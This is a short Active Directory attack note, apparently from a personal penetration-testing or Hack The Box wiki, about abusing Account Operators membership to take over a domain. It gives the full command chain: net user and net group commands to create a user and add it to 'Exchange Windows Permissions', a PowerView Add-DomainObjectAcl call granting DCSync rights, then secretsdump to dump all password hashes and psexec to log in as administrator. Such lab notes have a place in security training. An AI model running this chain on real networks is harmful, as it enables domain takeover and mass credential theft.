Account Operators

Notice how the user we are in is part of a group that is part of account operators. Since we are part of Account Operators we can add a new user to the domain.

net user lyethar password /add /domain

We add ourselves to a group we are also part of as the current user. This is the "Exchange Windows Permissions" group.

net group "Exchange Windows Permissions"  /add lyethar

We upload Powerview.ps1 and run the following commands.

$pass= ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('DOMAINNAME\lyethar', $pass)
Add-DomainObjectAcl  -Credential $cred  -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity lyethar -Rights DCSync

Then with the user we created, we run secrets dump to dump all the hashes and then psexec to log in as the administrator.

PreviousGMSA Password Read NextWriteDACL over DCSync

Last updated 2 years ago